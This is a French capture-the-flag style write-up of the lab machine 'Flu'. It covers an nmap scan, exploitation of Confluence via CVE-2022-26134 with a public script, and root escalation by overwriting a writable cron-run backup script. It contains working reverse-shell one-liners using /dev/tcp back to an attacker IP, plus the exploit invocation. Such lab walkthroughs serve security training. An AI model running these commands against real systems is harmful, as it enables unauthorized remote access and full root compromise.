# Flu

`confluence` `pspy`

* Nom machine : Flu
* Difficulté : Intermédiaire
* OS : Linux

## Enumération

### NMAP

```
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-08-27 17:30 EDT
Nmap scan report for 192.168.208.41
Host is up (0.034s latency).
Not shown: 65532 closed tcp ports (conn-refused)
PORT     STATE SERVICE       VERSION
22/tcp   open  ssh           OpenSSH 9.0p1 Ubuntu 1ubuntu8.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   256 02:79:64:84:da:12:97:23:77:8a:3a:60:20:96:ee:cf (ECDSA)
|_  256 dd:49:a3:89:d7:57:ca:92:f0:6c:fe:59:a6:24:cc:87 (ED25519)
8090/tcp open  opsmessaging?
| fingerprint-strings: 
|   GetRequest: 
|     HTTP/1.1 302 
|     Cache-Control: no-store
|     Expires: Thu, 01 Jan 1970 00:00:00 GMT
|     X-Confluence-Request-Time: 1724794241442
|     Set-Cookie: JSESSIONID=C695CF2E7504EE870832EE6F8F423F54; Path=/; HttpOnly
|     X-XSS-Protection: 1; mode=block
|     X-Content-Type-Options: nosniff
|     X-Frame-Options: SAMEORIGIN
|     Content-Security-Policy: frame-ancestors 'self'
|     Location: http://localhost:8090/login.action?os_destination=%2Findex.action&permissionViolation=true
|     Content-Type: text/html;charset=UTF-8
|     Content-Length: 0
|     Date: Tue, 27 Aug 2024 21:30:41 GMT
|     Connection: close
|   HTTPOptions: 
|     HTTP/1.1 200 
|     MS-Author-Via: DAV
|     Content-Type: text/html;charset=UTF-8
|     Content-Length: 0
|     Date: Tue, 27 Aug 2024 21:30:41 GMT
|     Connection: close
|   RTSPRequest: 
|     HTTP/1.1 400 
|     Content-Type: text/html;charset=utf-8
|     Content-Language: en
|     Content-Length: 1924
|     Date: Tue, 27 Aug 2024 21:30:41 GMT
|     Connection: close
|     <!doctype html><html lang="en"><head><title>HTTP Status 400 
|     Request</title><style type="text/css">body {font-family:Tahoma,Arial,sans-serif;} h1, h2, h3, b {color:white;background-color:#525D76;} h1 {font-size:22px;} h2 {font-size:16px;} h3 {font-size:14px;} p {font-size:12px;} a {color:black;} .line {height:1px;background-color:#525D76;border:none;}</style></head><body><h1>HTTP Status 400 
|_    Request</h1><hr class="line" /><p><b>Type</b> Exception Report</p><p><b>Message</b> Invalid character found in the HTTP protocol [RTSP&#47;1.00x0d0x0a0x0d0x0a...]</p><p><b>Description</b> The server cannot or will not process the request due to something that is perceived to be a client error (e.g., malformed request syntax, invalid
8091/tcp open  jamlink?
| fingerprint-strings: 
|   FourOhFourRequest: 
|     HTTP/1.1 204 No Content
|     Server: Aleph/0.4.6
|     Date: Tue, 27 Aug 2024 21:31:17 GMT
|     Connection: Close
|   GetRequest: 
|     HTTP/1.1 204 No Content
|     Server: Aleph/0.4.6
|     Date: Tue, 27 Aug 2024 21:30:46 GMT
|     Connection: Close
|   HTTPOptions: 
|     HTTP/1.1 200 OK
|     Access-Control-Allow-Origin: *
|     Access-Control-Max-Age: 31536000
|     Access-Control-Allow-Methods: OPTIONS, GET, PUT, POST
|     Server: Aleph/0.4.6
|     Date: Tue, 27 Aug 2024 21:30:46 GMT
|     Connection: Close
|     content-length: 0
|   Help, Kerberos, LDAPSearchReq, LPDString, SSLSessionReq, TLSSessionReq, TerminalServerCookie: 
|     HTTP/1.1 414 Request-URI Too Long
|     text is empty (possibly HTTP/0.9)
|   RTSPRequest: 
|     HTTP/1.1 200 OK
|     Access-Control-Allow-Origin: *
|     Access-Control-Max-Age: 31536000
|     Access-Control-Allow-Methods: OPTIONS, GET, PUT, POST
|     Server: Aleph/0.4.6
|     Date: Tue, 27 Aug 2024 21:30:46 GMT
|     Connection: Keep-Alive
|     content-length: 0
|   SIPOptions: 
|     HTTP/1.1 200 OK
|     Access-Control-Allow-Origin: *
|     Access-Control-Max-Age: 31536000
|     Access-Control-Allow-Methods: OPTIONS, GET, PUT, POST
|     Server: Aleph/0.4.6
|     Date: Tue, 27 Aug 2024 21:31:22 GMT
|     Connection: Keep-Alive
|_    content-length: 0

```

### HTTP (8090)

Confluence 7.13.6

{% embed url="<https://github.com/jbaines-r7/through_the_wire>" %}

## Accès initial

```
┌──(kali㉿kali)-[~/oscp/flu]
└─$ python3 script.py --rhost 192.168.208.41 --rport 8090 --lhost 192.168.45.224 --protocol http:// --reverse-shell

   _____ _                           _     
  /__   \ |__  _ __ ___  _   _  __ _| |__  
    / /\/ '_ \| '__/ _ \| | | |/ _` | '_ \ 
   / /  | | | | | | (_) | |_| | (_| | | | |
   \/   |_| |_|_|  \___/ \__,_|\__, |_| |_|
                               |___/       
   _____ _            __    __ _           
  /__   \ |__   ___  / / /\ \ (_)_ __ ___  
    / /\/ '_ \ / _ \ \ \/  \/ / | '__/ _ \ 
   / /  | | | |  __/  \  /\  /| | | |  __/ 
   \/   |_| |_|\___|   \/  \/ |_|_|  \___| 

                 jbaines-r7                
               CVE-2022-26134              
      "Spit my soul through the wire"    
                     🦞                   

[+] Forking a netcat listener
[+] Using /usr/bin/nc
[+] Generating a reverse shell payload
[+] Sending expoit at http://192.168.208.41:8090/
listening on [any] 1270 ...
connect to [192.168.45.224] from (UNKNOWN) [192.168.208.41] 52560
bash: cannot set terminal process group (733): Inappropriate ioctl for device
bash: no job control in this shell
confluence@flu:/opt/atlassian/confluence/bin$ 

```

## Elévation des privilèges

Après une première recherche et une première exécution de linpeas.sh on ne trouve rien d'intéressant. Cependant, un fichier étrange se trouve dans /opt... un fichier qui pourrait parfaitement s'exécuter automatiquement (et on a les droits en écriture). Nous allons vérifier avec pspy64.

```
{...}
2024/08/27 22:12:01 CMD: UID=0     PID=25442  | /bin/sh -c gzip 
2024/08/27 22:12:01 CMD: UID=0     PID=25443  | find /root/backup -name log_backup_* -mmin +5 -exec rm -rf {} ; 
2024/08/27 22:12:01 CMD: UID=0     PID=25444  | find /root/backup -name log_backup_* -mmin +5 -exec rm -rf {} ; 
2024/08/27 22:12:01 CMD: UID=0     PID=25445  | find /root/backup -name log_backup_* -mmin +5 -exec rm -rf {} ; 
2024/08/27 22:13:01 CMD: UID=1001  PID=25446  | bash -c bash -i >& /dev/tcp/192.168.45.224/1270 0>&1 
2024/08/27 22:13:01 CMD: UID=1001  PID=25448  | 
2024/08/27 22:13:01 CMD: UID=1001  PID=25449  | bash -i 
2024/08/27 22:13:01 CMD: UID=0     PID=25450  | /usr/sbin/CRON -f -P 
2024/08/27 22:13:01 CMD: UID=0     PID=25451  | /usr/sbin/CRON -f -P 
2024/08/27 22:13:01 CMD: UID=0     PID=25452  | 
2024/08/27 22:13:01 CMD: UID=0     PID=25453  | /bin/bash /opt/log-backup.sh 
2024/08/27 22:13:01 CMD: UID=0     PID=25454  | /bin/bash /opt/log-backup.sh 
2024/08/27 22:13:01 CMD: UID=0     PID=25456  | tar -czf /root/backup/log_backup_20240827221301.tar.gz /root/backup/log_b
ackup_20240827221301 
2024/08/27 22:13:01 CMD: UID=0     PID=25455  | tar -czf /root/backup/log_backup_20240827221301.tar.gz /root/backup/log_b
ackup_20240827221301 
2024/08/27 22:13:01 CMD: UID=0     PID=25457  | /bin/sh -c gzip 
2024/08/27 22:13:01 CMD: UID=0     PID=25458  | /bin/bash /opt/log-backup.sh 
2024/08/27 22:13:01 CMD: UID=0     PID=25459  | rm -rf /root/backup/log_backup_20240827220801.tar.gz 
2024/08/27 22:13:01 CMD: UID=0     PID=25460  | 
2024/08/27 22:13:06 CMD: UID=1001  PID=25461  | ls 
{...}
```

`/bin/bash /opt/log-backup.sh`

```
confluence@flu:/opt$ echo '#!/bin/bash' > log-backup.sh
confluence@flu:/opt$ echo '/bin/bash -i >& /dev/tcp/192.168.45.224/1234 0>&1' >> log-backup.sh
```

```
┌──(kali㉿kali)-[~/oscp/flu]
└─$ nc -lnvp 1234                                                                                                  
listening on [any] 1234 ...
connect to [192.168.45.224] from (UNKNOWN) [192.168.208.41] 52144
bash: cannot set terminal process group (25516): Inappropriate ioctl for device
bash: no job control in this shell
root@flu:~# whoami
whoami
root
```